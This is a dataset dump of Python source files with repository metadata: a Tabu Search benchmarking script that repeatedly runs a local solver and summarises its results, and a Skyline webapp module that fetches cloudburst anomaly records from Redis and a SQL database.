def add_message(self, message_object):
self._mails.append(message_object)
def get_message(self, index):
return self._mails[index].to_string()
def remove_message(self, index):
del self._mails[index]
| [
"[email protected]"
]
| |
69125d0d670089b391b47812638b43f7c459c0b5 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322174510.py | 7aa63cf5264177dcd88e4e6fbb297d2a899aa036 | []
| no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,365 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 100
tabuIteration = '1000'
tabuDuration = '40'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
if int(solution) != 5644:
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('{} : best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(i, solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {max(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
unique_local_minimum = list(dict.fromkeys(local_minimum))
print(f'totally the algorithm was stuck in local optimum {len(local_minimum)} times \nthere are {len(unique_local_minimum)} unique local minimum \nthe best local optimum is {min(unique_local_minimum)} \nthe worst local optimum is {max(unique_local_minimum)}') | [
"[email protected]"
]
| |
39594fdee131460d72ed27b8368bb94bb8fdcf98 | 50203b4a349dcb2ed1e72c9f5463d84db8a6e983 | /skyline/webapp/luminosity_cloudbursts.py | 0048fa8b6fb7fcecf903537da9ede688c880d75c | [
"MIT"
]
| permissive | earthgecko/skyline | 97e43df824d7c92d68086f529f0f3d051a7debb0 | c2edc451e63d5eb57117ddcfbc6e79100e706460 | refs/heads/master | 2023-08-30T08:36:50.740285 | 2023-06-28T15:33:47 | 2023-06-28T15:33:47 | 20,475,900 | 482 | 74 | NOASSERTION | 2023-06-28T15:33:49 | 2014-06-04T08:33:15 | Python | UTF-8 | Python | false | false | 12,756 | py | import logging
import os
from ast import literal_eval
import traceback
import settings
import skyline_version
from skyline_functions import get_redis_conn_decoded
from matched_or_regexed_in_list import matched_or_regexed_in_list
from sqlalchemy.sql import select
from database import get_engine, cloudburst_table_meta
# @added 20221103 - Task #2732: Prometheus to Skyline
# Branch #4300: prometheus
from functions.metrics.get_base_name_from_labelled_metrics_name import get_base_name_from_labelled_metrics_name
skyline_version = skyline_version.__absolute_version__
skyline_app = 'webapp'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
try:
ENABLE_WEBAPP_DEBUG = settings.ENABLE_WEBAPP_DEBUG
except EnvironmentError as outer_err:
logger.error('error :: cannot determine ENABLE_WEBAPP_DEBUG from settings - %s' % outer_err)
ENABLE_WEBAPP_DEBUG = False
this_host = str(os.uname()[1])
def get_filtered_metrics(redis_conn_decoded, namespaces):
"""
Get create a list of filter_by_metrics.
:param redis_conn_decoded: the redis_conn_decoded object
:param namespaces: the namespaces to match
:param from_timestamp: the from_timestamp
:param until_timestamp: the until_timestamp
:type redis_conn_decoded: str
:return: list of metrics
:rtype: list
"""
function_str = 'get_cloudbursts :: get_filtered_metrics'
filter_by_metrics = []
redis_key = 'analyzer.metrics_manager.db.metric_names'
unique_base_names = []
try:
unique_base_names = list(redis_conn_decoded.smembers(redis_key))
if unique_base_names:
logger.info('%s :: got %s unique_base_names' % (
function_str, str(len(unique_base_names))))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get Redis key %s - %s' % (
function_str, redis_key, err))
raise
for base_name in unique_base_names:
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, namespaces)
if pattern_match:
filter_by_metrics.append(base_name)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get Redis key %s - %s' % (
function_str, redis_key, err))
return filter_by_metrics
def get_metric_ids(redis_conn_decoded, filter_by_metrics):
"""
Get create a list of metric ids and dict of metric_names_with_ids.
:param redis_conn_decoded: the redis_conn_decoded object
:param namespaces: the namespaces to match
:param from_timestamp: the from_timestamp
:param until_timestamp: the until_timestamp
:type redis_conn_decoded: str
:return: (list of metrics, dict of metric_names_with_ids)
:rtype: (list, dict)
"""
function_str = 'get_cloudbursts :: get_metric_ids'
metric_ids = []
try:
metric_names_with_ids = redis_conn_decoded.hgetall('aet.metrics_manager.metric_names_with_ids')
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get Redis hash aet.metrics_manager.metric_names_with_ids - %s' % (
function_str, err))
raise
for base_name in filter_by_metrics:
try:
metric_ids.append(int(metric_names_with_ids[base_name]))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to add metric id to metric_ids for %s from metric_names_with_ids - %s' % (
function_str, base_name, err))
return (metric_ids, metric_names_with_ids)
def get_cloudbursts(metric, namespaces, from_timestamp, until_timestamp):
"""
Get create a dict of all the cloudbursts.
:param metric: the name of the metric
:param namespaces: the namespaces to match
:param from_timestamp: the from_timestamp
:param until_timestamp: the until_timestamp
:type metric: str
:type namespaces: list
:type from_timestamp: int
:type until_timestamp: int
:return: dict of cloudbursts
:rtype: {}
Returns a dict of cloudbursts
{
"cloudbursts": {
<id>: {
'metric_id': <int>,
'metric': <str>,
'timestamp': <int>,
'end': <int>,
'duration': <int>,
'duration': <int>,
'from_timestamp': <int>,
'resolution': <int>,
'full_duration': <int>,
'anomaly_id': <int>,
'match_id': <int>,
'fp_id': <int>,
'layer_id': <int>,
'added_at': <int>,
},
}
}
"""
function_str = 'get_cloudbursts'
cloudbursts_dict = {}
engine = None
metric_ids = []
use_filter_by_metrics = False
filter_by_metrics = []
metric_names_with_ids = {}
ids_with_metric_names = {}
logger.info(
'get_cloudbursts - metric: %s, namespaces: %s, from_timestamp: %s, until_timestamp: %s' % (
str(metric), str(namespaces), str(from_timestamp),
str(until_timestamp)))
if metric != 'all':
# @added 20221103 - Task #2732: Prometheus to Skyline
# Branch #4300: prometheus
use_metric = str(metric)
if metric.startswith('labelled_metrics.'):
use_metric = str(metric)
try:
metric = get_base_name_from_labelled_metrics_name(skyline_app, use_metric)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: get_base_name_from_labelled_metrics_name failed with %s - %s' % (
function_str, metric, err))
raise
logger.info(
'get_cloudbursts - looked up %s to metric: %s' % (
use_metric, str(metric)))
if not metric:
logger.error('error :: %s :: failed to look up metric' % function_str)
raise ValueError('failed to look up metric')
filter_by_metrics = [metric]
use_filter_by_metrics = True
if not namespaces:
namespaces = [metric]
if namespaces == ['all']:
namespaces = [metric]
try:
redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: get_redis_conn_decoded failed - %s' % (
function_str, err))
raise
filter_by_metrics = get_filtered_metrics(redis_conn_decoded, namespaces)
if namespaces:
use_filter_by_metrics = True
if metric != 'all':
try:
metric_id = int(redis_conn_decoded.hget('aet.metrics_manager.metric_names_with_ids', metric))
if metric_id:
metric_names_with_ids[metric] = metric_id
metric_ids.append(metric_id)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get %s from Redis hash aet.metrics_manager.metric_names_with_ids - %s' % (
function_str, metric, err))
raise
metric_ids, metric_names_with_ids = get_metric_ids(redis_conn_decoded, filter_by_metrics)
if len(filter_by_metrics) > 1:
use_filter_by_metrics = True
for base_name in list(metric_names_with_ids.keys()):
metric_id = int(metric_names_with_ids[base_name])
ids_with_metric_names[metric_id] = base_name
try:
engine, log_msg, trace = get_engine(skyline_app)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get engine - %s' % (
function_str, err))
raise
try:
cloudburst_table, log_msg, trace = cloudburst_table_meta(skyline_app, engine)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get cloudburst_table - %s' % (
function_str, err))
raise
try:
connection = engine.connect()
if use_filter_by_metrics:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids))
if from_timestamp > 0 and until_timestamp == 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp >= from_timestamp)
if from_timestamp == 0 and until_timestamp > 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp <= until_timestamp)
if from_timestamp > 0 and until_timestamp > 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp >= from_timestamp).\
where(cloudburst_table.c.timestamp <= until_timestamp)
else:
stmt = select([cloudburst_table])
if from_timestamp > 0 and until_timestamp == 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp >= from_timestamp)
if from_timestamp == 0 and until_timestamp > 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp <= until_timestamp)
if from_timestamp > 0 and until_timestamp > 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp >= from_timestamp).\
where(cloudburst_table.c.timestamp <= until_timestamp)
results = connection.execute(stmt)
for row in results:
# @modified 20230126
# Wrapped in try except
try:
cloudburst_id = row['id']
metric_id = row['metric_id']
cloudbursts_dict[cloudburst_id] = dict(row)
try:
cloudbursts_dict[cloudburst_id]['metric'] = ids_with_metric_names[metric_id]
except KeyError:
use_metric_name = 'labelled_metrics.%s' % str(metric_id)
logger.warning('warning :: %s :: failed to find metric name for metric id in ids_with_metric_names, using %s' % (
function_str, use_metric_name))
cloudbursts_dict[cloudburst_id]['metric'] = use_metric_name
except Exception as err:
logger.error('error :: %s :: failed to iterate row from cloudburst_table - %s' % (
function_str, err))
connection.close()
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get cloudburst_table - %s' % (
function_str, err))
raise
# Reorder the dict keys for the page
cloudbursts_dict_keys = []
key_ordered_cloudbursts_dict = {}
if cloudbursts_dict:
cloudburst_ids = list(cloudbursts_dict.keys())
first_cloudburst_id = cloudburst_ids[0]
for key in list(cloudbursts_dict[first_cloudburst_id].keys()):
cloudbursts_dict_keys.append(key)
for cloudburst_id in cloudburst_ids:
key_ordered_cloudbursts_dict[cloudburst_id] = {}
for key in cloudbursts_dict[cloudburst_id]:
if key == 'id':
key_ordered_cloudbursts_dict[cloudburst_id][key] = cloudbursts_dict[cloudburst_id][key]
key_ordered_cloudbursts_dict[cloudburst_id]['metric'] = cloudbursts_dict[cloudburst_id]['metric']
for key in cloudbursts_dict[cloudburst_id]:
if key not in ['id', 'metric']:
key_ordered_cloudbursts_dict[cloudburst_id][key] = cloudbursts_dict[cloudburst_id][key]
cloudbursts_dict = key_ordered_cloudbursts_dict
cloudburst_ids = list(cloudbursts_dict.keys())
cloudburst_ids.reverse()
desc_cloudbursts_dict = {}
for c_id in cloudburst_ids:
desc_cloudbursts_dict[c_id] = cloudbursts_dict[c_id]
cloudbursts_dict = desc_cloudbursts_dict
logger.info('%s :: found %s cloudbursts' % (
function_str, str(len(list(cloudbursts_dict.keys())))))
return cloudbursts_dict
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.